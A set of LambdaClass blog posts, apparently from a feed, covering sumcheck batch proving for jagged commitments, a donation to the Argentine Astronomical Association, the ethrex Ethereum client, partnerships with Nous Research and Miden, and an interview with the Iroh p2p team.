Using the sumcheck protocol for products of multilinears, it suffices for the verifier to show that $v = q(\alpha) f_t (\alpha)$, which in turn amounts to $q(\alpha) = \beta_1$ and $f_t (\alpha) = \beta_2$. The key point lies in that $f_t$ can be efficiently evaluated by the verifier. This is proven in claim 3.2.1.</p>
To show that the function can be computed efficiently, the paper introduces a function $g(w,x,y,z)$ which satisfies that $g(w,x,y,z) = 1$ if and only if $x < z$ and $x = w + y$. This function can be directly related to $f_t$ and $g$ can be computed efficiently using a width 4 branching program:

$f_t (z_r , z_c , i) = \sum_y \mathrm{eq} (z_r , y) g(z_c , y , t_{y - 1} , t_y )$</p>
The proof relies on the uniqueness of the multilinear extension, so it suffices to check the equality for $z_r , z_c , i$ as binary strings. If $g(z_r , i , t_{ y - 1} , t_y ) = 1$, then $i < t_y$ and $i = z_r + t_{ y - 1}$. Since $z_r \geq 0$, it follows that $t_{y - 1} \leq i < t_y$ and $z_r = i - t_{y - 1}$. Since we have that $\mathrm{col}_t (i) = z_c$ and $\mathrm{row}_t (i) = z_r$, it follows that $f_t (z_r , z_c , i) = 1$. Similarly, if $f_t (z_r , z_c , i) = 1$, then the variables $w, x, y , z$ automatically satisfy the conditions for $g(w,x,y,z) = 1$.</p>
From the above, we see that we can compute $f_t$ by calculating $2^k$ evaluations of $g$. By claim 3.2.2, a width-4 read-once branching program can compute efficiently $g$, by inspecting each bit of $w, x, y, z$ in a streaming fashion. The conditions $i < t_y$ and $z_r = i - t_{ y - 1}$ for non-vanishing $g$ can be inspected by looking at 4 bits at a time and keeping track of two additional variables.</p>
The paper then discusses how to produce symbolic evaluations using a read-once matrix branching program, which we will need for batch-proving multiple evaluations. The program is defined by a sequence of matrices $M = {M_j^\sigma }$ where $\sigma \in { 0,1 }^b$ and $j = 1, 2, … , n$ and a sink vector $u$. Given an input $x \in {0 , 1 }^n$, the output of the program is the first component of the vector given by $(\prod M_j^{ x_j }) u$, that is $e_1^t (\prod M_j^{ x_j }) u$, where $e_{1j} = \delta_{1j}$ (one if and only if $j = 1$, zero otherwise).</p>
If the matrices are boolean matrices (having as entries either $0$ or $1$), matrix multiplication involves only additions (the paper calls matrices multiplication friendly if computing their product involves a linear number of additions and no multiplications).</p>
When the sink vector $u$ is not given, the evaluation can be done in symbolic form, and, when the vector is finally given, get the final value of the matrix branching program. The idea is that we can get a vector $\mathrm{res}$ such that $\mathrm{res} . u = f_{M,u} (z)$, where $f$ is the multilinear extension of the matrix branching program given by $M$ and $u$. The vector $\mathrm{res}$ is given by

$$\mathrm{res} = e_1^t \prod_j \left( \sum_\sigma \mathrm{eq} (z_j , \sigma) M_j^\sigma \right)$$</p>
Batch-proving of multiple evaluations</h2>
The problem we face is that the verifier should compute $k$ evaluations, which can be prohibitely costly. However, by interacting with the prover, we can boil everything down to just one evaluation. This follows a standard technique, where the verifier selects random weights $\alpha_0, \alpha_1, … \alpha_{ k - 1}$ and the prover performs a random linear combination. More precisely, suppose that we want to prove that

$h (z_0 ) = v_0$

$h (z_1 ) = v_1$

$\vdots$

$h (z_{ k - 1} ) = v_{ k - 1}$

The prover then does the following linear combination with $\alpha_j$,

$\sum_j \alpha_j h( z_j ) = \sum_j \alpha_j v_j$

The prover wants to convince the verifier that $h( z_j ) = v_j$ holds for every $j$, so $v_j$ is sent to the verifier. The verifier can compute the sum on the right-hand side on his own, $\sum \alpha_j v_j$.</p>
The left-hand side can be calculated efficiently by the prover. First, note that

$h( z_j ) = \sum h (b) \mathrm{eq} (b , z_j) = \sum h_k \mathrm{eq} (b , z_j)$

where $k = \sum_j b_j 2^j$ with $b = b_0 b_1 b_2 … b_{ k - 1}$. In other words, the evaluation $h (z_j)$ can be computed as the inner product between the vector h, such that $h_k = h(b)$, and the vector of Lagrange basis polynomials $\mathrm{eq}(b , z_j)$. Since the inner product is (bi)linear, we can write the linear combination as

$\sum \alpha_j h( z_j ) = \sum h(b) \left(\sum \alpha_j \mathrm{eq} (b , z_j) \right)$

The prover and verifier can run the sumcheck protocol on $\left(h(b) \sum \alpha_j \mathrm{eq} (b , z_j) \right)$ and at the end the verifier has to compute $h(\rho ) \sum \alpha_j \mathrm{eq} (\rho , z_j)$ at the random point $\rho$, which in practice would be an oracle query for $h$ plus computing the linear combination $\sum \alpha_j \mathrm{eq} (\rho , z_j)$. Some optimizations used in the sumcheck protocol are presented in improvements on zerocheck</a>.</p>
Where does all this fit in and future work</h2>
The jagged approach allows us to commit to the non-zero part of tables and save a lot of work, both in terms of memory requirements as well as commitment times. If we combine this idea with M3 arithmetization</a>, where we do not need to commit to polynomials that can be computed via certain operations from trace polynomials (virtual polynomials), we see a massive reduction in the amount of work we have to do. This, in turn, could drive proving time, proving cost and memory footprint down, allowing us to prove bigger Ethereum and L2 blocks, effectively scaling it to bring more users and power more usecases.</p>


Supporting Science: LambdaClass Donates to the Argentine Astronomical Association
Unknown — Thu, 29 May 2025 00:00:00 +0000
At LambdaClass we believe that advancing science requires collaboration across disciplines and sectors. As part of our commitment to supporting scientific research and education, we recently made a donation to the Asociación Argentina de Astronomía</em></a> (Argentine Astronomical Association), a non-profit organization dedicated to promoting astronomical research and knowledge in Argentina since 1958.</p>
We were honored to receive the following letter of appreciation from the Association:</p>

Dear Federico Carrone,</strong></p>
We would like to express our deepest gratitude, and ask that you extend it to LambdaClass, for the generous annual donation of USD 10,000 to the Argentine Astronomical Association (AAA). This contribution will cover the two most significant annual expenses of our organization, which in some years account for up to 80% of our total budget:</p>
a) The payment of the national membership fee to the International Astronomical Union (IAU) for Argentine astronomers and physicists;</p>
b) The annual contribution as a sponsoring country of the journal Astronomy & Astrophysics</em> (A&A).</p>
Why does IAU membership justify this investment?</strong></h3>
    1. Access to travel grants for General Assemblies, Regional Meetings, and Symposia.</span></span>
    2. Active participation in the scientific structure of the IAU, with opportunities to hold leadership positions on the Executive Committee and to join Divisions, Commissions, and Working Groups, as well as to propose symposia.</span></span>
    3. Eligibility for IAU awards, which recognize scientific excellence and community engagement.</span></span>
    4. Access to development and outreach grants that support socially impactful projects and specialized training events.</span></span>
    5. Participation in global scientific resolutions and decision-making processes.</span></span>
    6. Regular newsletters from Divisions and Commissions, becoming an active member of the largest international community of professional astronomers.</span></span>
    7. Promotion of astronomy in STEM education at all levels through the IAU Office of Astronomy for Education (IAU-OAE).</span></span></code></pre>Argentina as a sponsoring country of Astronomy & Astrophysics</em> (A&A):</strong></h3>
A &A</em> is consistently ranked among the most prestigious journals in the field of astronomy and astrophysics worldwide. Publishing in it is considered a significant scientific achievement.</p>
Its open-access model ensures that all articles are freely and immediately available globally, increasing both their visibility and citation potential.</p>
Thanks to Argentina’s sponsorship, our astronomy community can publish in A &A</em> without additional costs or delays. Without this benefit, individual researchers would face fees of up to USD 2,000 per article.</p>
Through its annual contribution LambdaClass will enable (primarily but not exclusively) the astronomers and physicists of the Argentine astronomical community to publish their articles at no additional cost in one of the most prestigious international journals of Astronomy and Astrophysics, while maintaining our contribution to the international scientific community.</p>

We believe in long-term investment in knowledge and curiosity-driven research. Like computer science, astronomy is built on rigorous thinking, open collaboration, and the pursuit of deeper understanding.</p>
This donation is more than a gesture; it’s a recognition of the vital role that institutions such as the Asociación Argentina de Astronomía play in advancing science and education in our country, and a tribute to the people who make that work possible.</p>
Civil and public institutions are only as strong as the societies that support and value them. By strengthening these institutions, we strengthen our collective future.</p>


Celebrating a year of ethrex
Unknown — Fri, 16 May 2025 00:00:00 +0000
We have been working at LambdaClass on an Ethereum L1 Execution and L2 client called ethrex since June 2024. Now that it’s maturing and recently added to Hive</em></a>, we think it’s time to talk about it a bit and highlight what sets it apart from others.</p>
Ethrex began as an exploratory project with just three team members and has since grown into a 40-person initiative—now one of LambdaClass’ top priorities. It is the first stack to natively incorporate based rollups since day one. We’re preparing to enter the security audit phase and will move directly into production with Rogue</em></a>, alongside several institutions and clients eager to deploy their own L2 stacks.</p>
Most of the ideas that motivate ethrex share a core tenet: simplicity. We recommend reading Vitalik’s recent post</em></a> about simplifying the L1; it shares many of the same ideas we will talk about in this post and greatly resonates with us as a guiding principle.</p>
Why build yet another Ethereum execution client?</strong></h2>
At this point, the Ethereum ecosystem has good client diversity: Geth, Besu, Erigon, Nethermind and Reth are all production-grade choices, though with varying degrees of popularity. So why write a new client, and why do it in Rust when Reth exists?</p>
The more we got involved in the crypto space and used its tools and codebases, the more we realized that most of them had more complexity than we were comfortable with; sometimes even actively seeking it as part of their development process. Libraries with dozens of modules to modularize even the slightest things, APIs with tons of traits and generics looking to abstract every contingency, macros used to (debatably) save lines of code at the cost of readability, these are all inconveniences we and others have to constantly deal with when integrating with crypto repositories.</p>
Ethrex is our attempt at solving this. It aims to be the infrastructure, libraries and tooling we wish we had when we started. In line with the LambdaClass work ethos</em></a>, our goal is to always keep things simple and minimal. This is reflected in a few different ways.</p>
We track lines of code for the project, ensuring we never go over a limit. The entire repo currently sits at 62k lines. This includes code for our EVM implementation, our L2 stack (along with ZK provers and TEE code), and our ethereum sdk. Most other clients average around 200k on their main repos, not even counting their dependencies, that are usually split into other repos (EVM, sdk, provers). Including those can easily tip it over 300k or more. Our approach heavily leans into vertical integration and minimalism, ensuring we have control over the whole stack while keeping it as simple as possible.</p>
We have daily automated slack messages to be vigilant about lines of code on our project, and regularly look for dead or unnecessary code and refactor opportunities to trim them down.</p>
Lines of code report</p>
As the image above shows, the ethrex repo consists only of six self-explanatory main crates:</p>
    * blockchain</span></span>
    * common</span></span>
    * l2</span></span>
    * networking (divided into p2p and rpc)</span></span>
    * storage</span></span>
    * vm</span></span></code></pre>
This is very much on purpose; other clients tend to modularize code too much into different packages, hurting readability and simplicity.</p>
Use of traits is kept to a minimum, only when it absolutely makes sense to introduce them. Our codebase contains as few as 12 traits, which we already consider to be too many and are actively looking to reduce them. They are used for the following:</p>
    * RLP encoding and decoding.</span></span>
    * Signing of data.</span></span>
    * Trie Storage, Regular Storage, and L2 Storage.</span></span>
    * RLPx encoding and RPC handlers.</span></span>
    * EVM hooks.</span></span></code></pre>
Use of macros is frowned upon throughout the codebase. There are only four of them in ethrex, three used only for tests and one for Prometheus metrics collection.</p>
Dependencies are also kept in check as much as possible. Rust codebases are notorious for piling up crates, and while we still consider we depend on too many of them, we make periodic efforts to reduce them.</p>
Minimalism is also reflected in our decision not to implement historical features; ethrex only supports post merge forks. We believe Ethereum should have a forward-looking accelerationist attitude to win over its competitors in the blockchain landscape, which means moving fast, embracing change, and remaining lean by not being afraid of quickly dropping support for old features. This also improves ROI on the project because it allows us to both develop and maintain it with a smaller team.</p>
We are very opinionated about how to write Rust code. While we love the language for its mix of high performance, memory safety guarantees and high level language constructs, we believe it is easy to get carried away with its features and overcomplicate codebases; having a rich and expressive type system does not mean one should take every opportunity to reify every problem into it through a trait. This obfuscates code for newcomers and makes it more complex at very little benefit.</p>
For developers, all this has an impact not only on readability and ease of use, but also on compilation times. Complex code architectures with many traits and macros add to compile times, which hurts developer experience. It is not uncommon to see Rust projects take multiple minutes to compile on modern machines, and code complexity plays a big part in that.</p>
However, simplicity and minimalism is not just about making developer experience easier. The fewer the lines of code, the easier it is to maintain the code, to find bugs or vulnerabilities, and to spot possible performance bottlenecks and improvements. It also reduces the attack surface for security vulnerabilities to be there in the first place.</p>
Ethrex L2</strong></h2>
From the beginning, ethrex was conceived not just as an Ethereum L1 client, but also as an L2 (ZK Rollup) client. This means anyone can use ethrex to deploy an EVM equivalent, multi-prover (supporting SP1, RISC Zero and TEEs) based rollup with just one command. Financial institutions can also use it to deploy their own L2, with the choice of deploying it as a Validium, a based Rollup or a regular ZK Rollup. In fact, our upcoming permissionless based L2 Rogue</em></a> uses ethrex and anyone will be able to join it by just cloning the repo and running a command.</p>
Key to the development of ethrex L2 is the availability of general purpose ZK virtual machines using hash-based proving systems, such as SP1 and RISC Zero, that allow proving arbitrary code written in Rust.</p>
Being in the crypto space for some years now, we have experienced firsthand the pains of writing arithmetic circuits using libraries like Circom, Bellman, Arkworks or Gnark. Doing so requires in-depth knowledge about the internals of zk-SNARKS, which most engineers do not and should not care about. Additionally, requiring a different API or DSL to write circuits means you end up with two implementations of the same thing: one out of circuit and one in-circuit. This is a huge source of problems, because on every code change there’s the possibility of a divergence between the code being executed and the code being proven, and solving those types of bugs can be challenging and time consuming.</p>
With a RISC-V zkVM, those problems go away; engineers can easily write the code to be proven without having to understand any of the internals, and the chances of a divergence are minimal, because almost all code can be shared between the “out of circuit” and the “in circuit” versions.</p>
ZK-rollups like Scroll and ZKsync tightly coupled their proving system with their VM. While this worked, it meant having a non-EVM architecture and going through a lot of hoops to support EVM equivalence. It also meant having an in-house team of expert cryptographers to design and develop all the complex circuits required to prove their execution. At LambdaClass, we believe that the low level cryptography should be left to projects like Starkware’s Stwo, Lita’s Valida, Polygon’s PetraVM, Succinct’s SP1, or a16z’s Jolt. Our job is to then plug their work into ours, decoupling the cryptography from the rest of the codebase, greatly simplifying the development. This is what allowed us to be the only client designed from the beginning to be an L1, an L2 and a based rollup.</p>
All these benefits can be seen very clearly: the entire l2/prover directory where all the related code lives has only 1.3k lines of code, and even that can be reduced further since we haven’t moved some behavior to common functions yet. In other projects we have used and worked with, the ZK-related code was massive, sometimes matching or surpassing the regular non-ZK one.</p>
What’s left</strong></h2>
We have made a lot of progress in the past year, from an empty repository to a full-fledged L1 and L2 client, but there is still work to be done to make ethrex production-ready. The main focus right now is on performance. We are currently sitting at around 0.3 gigagas/s, and we aim to hit at least 1 gigagas/s in the coming weeks, most of it coming from improvements to trie/database accesses. Afterwards come security audits and based rollup support. We also have extra features planned on top, including alternative DA support for validiums and custom native token mode, both for ethrex L2.</p>
This year’s Devconnect will take place in our hometown, Buenos Aires. By then, we aim to have a feature-complete version of ethrex running in production, ready to showcase some of its most exciting use cases. As mentioned, a growing number of companies and institutions have expressed interest in ethrex and its potential. Our mission is to help advance Ethereum’s development by building infrastructure and applications that address real-world challenges.</p>
We invite you to follow along our progress as we build in the open and try it out yourself:</p>
Telegram: https://t.me/ethrex_client</em></a>

Github: https://github.com/lambdaclass/ethrex</em></a></p>


Lambda's new strategic partnership with Nous Research: decentralized artificial intelligence
Unknown — Tue, 06 May 2025 00:00:00 +0000
We’re pleased to announce our partnership with Nous Research</strong> to help develop Psyche</strong> , a decentralized AI training network. The system is designed to allow anyone to contribute to model training using idle compute, making AI development more open, efficient, and verifiable.</p>
This initiative addresses a long-standing problem in AI: the high barrier to entry caused by the cost of training. Psyche is built to enable experimentation, lower infrastructure requirements, and distribute control away from a small number of centralized actors.</p>
What is Psyche?</h2>
Psyche is a Rust-based decentralized training system that uses peer-to-peer networking to coordinate multiple training runs across devices. Instead of relying on centralized data centers, it allows individual users with idle machines—such as gaming PCs—to contribute compute to model training.</p>
All coordination between nodes happens on the Solana blockchain</strong> , providing a fault-tolerant and censorship-resistant system.</p>
The Core Technology: DisTrO</h2>
Psyche is made possible by DisTrO</strong> , a set of training optimizers developed by Nous Research. DisTrO reduces the amount of data exchanged between nodes during training by several orders of magnitude, enabling training over standard broadband connections.</p>
The idea is conceptually similar to image compression (like JPEG): much of the essential information in a model’s gradient can be retained by transmitting only a few low-frequency components. DisTrO goes further by transmitting just the sign</strong> of each frequency amplitude, quantizing it down to one bit. This results in roughly a 3x further reduction in data transmission.</p>
Additionally, nodes can start training without immediately applying the updates from the previous training step. This means that network latency does not become a bottleneck, improving resource utilization and allowing decentralized training to approach the efficiency of centralized systems.</p>
The P2P Layer</h2>
Networking for Psyche is handled by Iroh</strong></a>, a protocol designed for decentralized applications:</p>
    * Each peer is identified by a 32-byte Ed25519 public key, not an IP address.</span></span>
    * Communication is end-to-end encrypted and authenticated.</span></span>
    * Nodes behind NAT or firewalls connect using UDP hole-punching in approximately 90% of cases, with relays used as fallback.</span></span></code></pre>
Nodes participating in training runs share training metadata using iroh-gossip</strong> , which builds on the HyParView and PlumTree protocols. Training results are shared using the iroh-blobs</strong> protocol, which bundles gradient information into binary blobs and references them via content-addressed tickets.</p>
Training Lifecycle</h2>
Training in Psyche occurs in epochs</strong> (groups of training steps). Nodes can join or leave the network at the start or end of an epoch, reducing the opportunity cost for contributors.</p>
At the beginning of each epoch, nodes download the current model (either from a HuggingFace repo or from other peers directly) and begin training. Some nodes act as witnesses</strong> , verifying received results using Bloom filters. If too few nodes remain active or witness quorum is lost, training is paused and checkpointed until new nodes join and resume the process.</p>
Verification</h2>
To verify that nodes are training correctly, selected nodes should recompute the training performed by another node and check that the resulting gradient is accurate</p>
Due to the non-deterministic nature of training (from rounding errors, hardware differences, etc.), the system must find a balance between accepting minor differences in output and detecting actual faults or adversarial behavior. Various similarity metrics—such as Jaccard index, Manhattan distance, and Hamming distance—are being explored.</p>
Why This Matters</h2>
The current landscape of AI is dominated by a small number of entities with access to significant compute resources. This centralization limits who can participate in developing and steering the future of AI.</p>
Our work with Nous Research on Psyche represents a meaningful step toward more open and equitable participation. It allows:</p>
    * Efficient use of idle compute</span></span>
    * Lower-cost training of custom models</span></span>
    * Greater experimentation and model diversity</span></span>
    * More transparency and less reliance on opaque corporate infrastructures</span></span></code></pre>
We believe AI should be owned by everyone. This partnership is a move in that direction. Lambda will work as hard as possible to build the new networks that make decentralized, open, and verifiable AI development practical, scalable, and accessible to all.</p>


Lambda's new strategic partnership with Miden: the Edge blockchain
Unknown — Mon, 05 May 2025 00:00:00 +0000
We are very proud to celebrate over 18 months of collaboration between Miden and LambdaClass. The partnership began by helping Miden develop the client, facilitating the execution and proving of transactions for the Miden network. Over time, our collaboration deepened, and we expanded our efforts to support the development of the protocol and node, focusing on various aspects. More recently, we’ve started assisting with the compiler effort, further expanding our involvement in the Miden ecosystem.</p>
Miden is the edge blockchain: a rollup for high-throughput, private applications, powered by the Miden-VM</a>, a STARK-based virtual machine. It has been designed using ZK technology, aiming to achieve two goals simultaneously: private state management and high scalability. These are crucial properties for real-world applications, allowing users to choose the data they want to share and process a large number of transactions. The actor-based model allows for concurrent transactions and ensures that transaction data is not revealed in the blockchain, enabling digital cash and giving users the choice of which information to keep publicly in the ledger. Thus, Miden enables applications to scale efficiently with both public and private transactions, meeting their diverse requirements.</p>
In Miden, accounts hold assets and can define rules for transferring them. The data can be public or private and is kept in a Miden node. Notes are a way to transfer assets and interact with other accounts, and they contain a script that indicates how the note can be consumed. The transfer of notes can be done asynchronously and privately. If the note is private, only its hash is stored on the chain. Asset transfer is done in two steps: first, the sender generates a note and updates its internal state. Secondly, the receiver account executes a new transaction to consume the note and update its internal state. Miden keeps track of the accounts’ state, the created notes, and the nullifiers for consumed notes.</p>
The Miden-VM is a STARK-based virtual machine with its customized instruction set architecture (ISA), using ZK-friendly primitives to make proving efficient. The VM works with the MiniGoldilocks field and its extensions, which have fast arithmetic. With its specialized ISA, programs need to be written in Miden assembly language. The development and use of compilers for general-purpose languages, such as Rust, will enable us to write high-level code and then compile it to Miden assembly to prove it, simplifying the development of provable applications.</p>
Achieving all these features requires a lot of engineering effort and thought, and Miden has made the right choices, focusing on what they want to offer users and clients, all while working fully open-source and sharing their work and insights with others.</p>
Our enthusiasm over Miden stems from the fact that it provides an innovative approach for blockchains: It leverages fast client-side proving for compliant privacy. Its design and architecture, inspired by the actor model, is simple yet elegant and very powerful, facilitating parallel transaction execution and batching for an incredible increase in throughput and scalability with minimal state bloat. With a mature codebase that empowers developers to solve complex problems, it sits right at the core of Lambda’s values.</p>
Looking ahead, we remain committed to advancing Miden’s mission and enabling all the possibilities it unlocks for users and developers alike.</p>


The Wisdom of Iroh
Unknown — Wed, 09 Apr 2025 00:00:00 +0000
As we’ve written before, most of us at Lambda are internet natives. The formative experiences that made us who we are include meeting people on the other side of the world through IRC, sharing knowledge, media, and code via BitTorrent, wikipedia, and software version control systems, the birth of the first search engines, and the feeling that everything</em>  was accessible. We then grew up and found frustration that this experience did not yet extend to the financial tasks needed to be an adult, and that terms like walled garden</em>  better described the new state of our internet home.</p>
This is why we get a double high when learning about projects like Iroh: an emotional tug from a project that enables building distributed systems in a way that gives users more agency, and a nerdy thrill from the technical challenges they’ve solved to achieve it.</p>
What is it?</h2>
Iroh</a> is a distributed systems toolkit, focused on easily setting up reliable p2p connections. It includes facilities for establishing direct connections, moving data, syncing state, and pluggable application-level protocols. It’s working in production and has managed 200k concurrent connections and millions of devices on the same network with low service costs.</p>
In their own words:</p>

Iroh is a library for establishing the most direct QUIC connection possible between two devices. Every endpoint</em>  uses the public half of a cryptographic keypair to identify itself. Assuming at least one configured relay server</em>  is reachable, an endpoint keeps exactly one TCP connection to a “home relay” that other nodes use for connection establishment, and as a fallback transport. Iroh uses a suite of discovery services</em>  to resolve home relays & endpoint IDs. Connections between endpoints use QUIC ALPNs to distinguish between protocols</em> , while routers</em>  automate the endpoint accept loop for protocol multiplexing.</p>
</blockquote>
One of the things we like about Iroh is that it is clear on what it is about. It runs on QUIC, started out as a new implementation of IPFS, went through several iterations, and reduced its scope to better solve the problems they were facing. They wrote about this process in their Smaller is Better</a> and Roadmap</a> posts, and we fully agree that this is good engineering practice.</p>
What can Iroh be used for?</h2>
n0</code></a>, the company behind Iroh, keeps a list</a> of projects building on them but to get a quick idea, it can be of use in anything that needs file sync, p2p game streaming, distributed object storage, peer discoverability and swarm membership, local-first design, or compute job orchestration.</p>
One of our partners, Nous Research</a> is using it in a decentralized program which relies on iroh to manage communications between nodes training LLMs, sending messages between the clients to advance the state of the network and share the gradients calculated by each node.</p>
Today, we interviewed the team to get some insight.</p>
1. Many of the n0 team members are ex-IPFS or libp2p developers. One of the first questions asked is how Iroh compares to libp2p and as we understand it, the answer is related to having a tighter focus, keeping the core about making p2p connections that just work, and moving the rest to application-level protocols such as iroh-gossip, -blobs and -docs that can be mixed and matched as desired. Can you elaborate on this process and how reducing scope helped?</em></h3>
b5: The process was one of slowly divesting ourselves of a lot of “p2p project baggage”. Most p2p projects end up defaulting into a boil-the-ocean stance where they try to ship one of everything: a DHT, transports, pubsub, RPC, and over time we’ve come to believe this is a big contributing factor to p2p projects feeling like half-baked prototypes. It clicked for us when our CTO dig pointed out “no one wants the nginx team to ship postgres”. A DHT is a huge undertaking, reliable sync is a huge undertaking, reliable transports are a huge undertaking. Sometime last year we realized it just wouldn’t be possible to ship all this stuff with the team we had, so we picked the transport layer, and are focused on integrating with other projects & the community forming near iroh for the things we can’t ship. Our bet is things will work better if a project like loro</a> ships optional iroh support</a>, the loro team makes a truly robust CRDT, and we make a truly robust transport. There’s pressure on both teams to make the public APIs small & composable, to make integration easier.

A lot of this is testament to just how incredible a technical feat libp2p</code> is, especially when you see the sheer number of language implementations, it’s truly impressive. But that amount of work comes with a big API surface area, makes it very challenging to port all of that functionality into a robust package that works well on a phone. It also creates the expectation that libp2p</code> maintainers commit to delivering both a robust DHT and</em> a reliable transport. When we more focus we explicitly mean fewer features that both work more consistently & are integrated across organizations.</p>
2. How did the decision to use QUIC come about? A few months ago some research</a> indicated QUIC might have some downsides and there seems to be anecdotal evidence of hostility to the new protocol from network engineers. Does your team have opinions wrt to any aspect of this? Are there any indications for Iroh adopters that might stem from QUIC usage?</h3>
b5: the goals of QUIC closely resemble what we’re trying to do with iroh: ship new capabilities on the internet with software</em>  because changing the hardware is impractical. QUIC is trying to tackle protocol ossification that set in because routers can inspect TCP headers, and doing that by dropping down to the UDP layer & working from there. Along with being aligned at “spiritual” level, things like QUIC multipath support seem almost designed for our exact use case. It’s a young technology that we’re all-in on.</p>
I haven’t heard much in the way of hostility from network engineers, but I’m not entirely surprised. QUIC is intentionally trying to reduce the visible surface area to routers & internet middleboxes, which I’m sure would be frustrating. I happen to be of the mind that internet middle boxes shouldn’t be messing with those packets in the first place, but hey, that’s just me 😄</p>
3. You’ve mentioned that Iroh has seen a million devices on the same network. Is this in relation to the public Iroh relays or in another context? What are the scalability limits you’ve seen and in which scenarios?</h3>
The biggest numbers we’ve seen have come from app developers deploying iroh as part of an update to an existing app. Each of those has stressed iroh in different ways. We’ve shipped against those stress tests for the last 6 months. It’s by no means done, but it is giving us in-production feedback that’s critical as we work toward our 1.0 release later this year.</p>
4. Iroh-gossip is particularly interesting as a modern implementation of HyParView and Plumtree. What made you choose these protocols? Have you done load tests on this protocol in particular? What is your approach to testing and load testing in general?</h3>
b5: phones. If we’re going to make p2p work on a mobile devices, “star” topologies that compensate for high network churn with lots of connections simply aren’t viable, which makes the active/passive divide in PlumTree particularly appealing. As I’m writing this someone in our discord is running a 2000 node iroh gossip stress test</a> using an erlang supervisor, so yes, it’s being tested! We also have a battery of smoke & simulation tests that run against the iroh gossip protocol as part of CI.

Gossip has been getting more attention lately, which is driving us to put more time into it. Frando from our team has been actively working on stability as we speak.</p>
5. You encourage users to set up their own relays for their networks but are also very generous with the three public ones you offer. Aside from avoiding the rate limits, why use private relays? Are there any security or other feature considerations?</h3>
b5: It’s totally fine to use the public relays! Honestly, we’d love to see more use so we can stress them more :). As a gentle reminder for everyone: relay traffic is e2ee, so the relays can’t see traffic, but relays do</em> have a list of nodeIDs, and list of connections they’re facilitating, which is privileged information. Many of our more serious users are using private relays to avoid exposing that information to the public, or even to number 0, which is things working as intended in our view. We have some plans in the works for a complimentary service that will make spinning up relays very easy. Stay tuned for that!</p>
6. When developing distributed systems, observability becomes a prime concern. Iroh-doctor</a> seems like a cool tool to have. Does Iroh offer other facilities for observing and debugging its internals or the application? What role does Iroh-metrics play in this?</h3>
b5: We’re actively working on this. Gathering actionable network metrics in a p2p system is critical as we make p2p a mature, reliable thing. We’ll have way more to say on this one in the coming months.</p>
7. P2P systems usually disclose the IP addresses of the participating nodes and Iroh explicitly chooss to give applications flexibility in what (if anything) to do in this regard. What choices do you see are usually taken, and what mechanisms (aside from VPNs) can applications implement?</h3>
b5: I should clarify that any connection within iroh will always</em> end up exposing your IP address to the peer that you’re dialing, and the relay server your node uses as it’s home. This is also true of so</em> many services you use every day, so iroh isn’t new in this regard. With that said, yeah a VPN is rarely a bad idea, and we expicitly run one-off tests between n0 staff where we start a big file transfer & switch VPN on & off during transfer to confirm it works (spoiler: it does).

The implications of connecting users will be different for each application, but we generally ask folks to use their heads: if your app is 5-100 person invite-only chat rooms, then it makes sense to couple iroh connections with room memberships. If your app is, say, twitter, then you might need to introduce a new opt-in mechanism that makes it clear to the user that you’re disclosing something that might be abused.</p>
8. The local-first software movement (prioritizing user data being stored and processed on their own devices rather than relying on cloud servers) is new and slowly gaining traction. Do you see Iroh being used in this context or are most of the main users focused on other use cases?</h3>
b5: YES. we <3 local first in a big way, and think p2p is the only way to get to software that is both local first and networked. The thing user agency, p2p, and local first all have in common is shipping more capabilities to the end-user’s device than we traditionally get with today’s “view layer on an API” apps.</p>
9. Coupling Iroh with a CRDT such as automerge</a> seems to be a common pattern. Iroh-docs seems geared to be a distributed KV store but is based on range-based set reconciliation. Do you see these higher-level usage patterns being codified as other protocols? Are there other protocols in development, or do you see any particular pattern as a likely future protocol?</h3>
b5: yes, iroh + automerge is definitely “using iroh as intended”, and you get at a good point: there are common patterns like message bootstrapping, incremental updates, and pairwise reconciliation that are commmon across a bunch of these protocols. To be able to actually have those protocols share abstractions for these patterns we’d need a more robust story for protcol composition than we currently have, because we’d need a way for a protocol to express dependencies & do protocol version matching across the set of registered protocols at compilation time. Even then, it would require the buy-in from projects like automerge, which really isn’t a goal of ours right now.

I think it’s going to take years, but I do think we’ll get to a place where we declare a dependency graph of protocols, the compiler will be able to tell you if you have a version mismatch, and we’ll be able to further decompose these patterns as a community. I’m doing some experiments in this direction on the side, but don’t expect to see anything in this department before we cut iroh 1.0.</p>
10. You’ve written</a> about the challenges of using async rust and we can certainly relate! In our experience Greenspun’s tenth rule applies transmuted to distributed systems (sometimes called Virding’s rule) “Any sufficiently complicated concurrent program in another language contains an ad hoc informally-specified bug-ridden slow implementation of half of Erlang.” What is your experience with the actor and message passing approach, both in Rust when implementing Iroh and more generally when using Iroh to build systems that communicate?</h3>
b5: lol yes very much to the half-Erlang. We’re very much in that uncanny valley right now with iroh. Most of the internal guts are implemented with actors, but we haven’t formalized that into an actor abstraction, and it’s unclear that we ever will. Where that pain is felt more accutely is at the protocol level. At the level of protocol developement, it would be very nice to have easy-to-implement patterns that abstract around distibuted fault tolerance & give you that “fail whenever you want” characteristic the supervisor trees bring. The protocol dev is also at the right height in the stack, dealing with logical messages instead of raw packets.

We’re still working on the groundwork of getting tutorials in place for writing a protocol in the first place, but I’d love to see us spend more time cooking up recipes for protcol development atop an actor model abstraction.</p>
</h3>
11. Your roadmap</a> is quite clear, webassembly support being oft-requested and recently merged, and better support on the way for clients wanting to use Iroh in browsers without having to send all data over relays. Some notable items in the more distant roadmap are a spec and FFI integrations. Can you elaborate on their importance and/or motivation? Do you have an estimate on when 1.0 is due and any comments on what motivates the upcoming features? What are you most excited about?</p>
b5: The spec part is fun because iroh can be pretty easily expressed as a composition of existing specs, which is our plan. In our view 1.0 means you know clearly what the thing is, and how it should</em> behave, so why not write that down in a spec? That said, we’re far more concerned with working software than a spec, and see taking the time to write out a spec as a means of confirming we’ve considered everything we need to as part of a 1.0 push, and can communicate that consideration clearly. As for FFI bindings, we really</em> , really</em> want to get to languages outside of rust, but have a lot of work to do here. More on FFI in the July-August time range. Current plan for 1.0 is sometime in September.

As for excitement, Divma & Floris on our team have been hard at work on support for QUIC multipath for months</em>. It’s a huge undertaking, and we’re all very excited to see it come together.</p>
12. Are there any bindings or plans for bindings to other languages? Iroh-ffi seems to provide support for Python, what is it’s status and do you plan to offer official support for any other languages?</h3>
b5: Yes, we have plans, but need to figure out some hard stuff around what basically amounts to duck-typing in UniFFI bindings first :)</p>
Many thanks to the Iroh team for taking the time to answer our questions!</p>
References

• https://www.iroh.computer/proto/iroh-gossip</a>

• https://www.bartoszsypytkowski.com/hyparview</a>

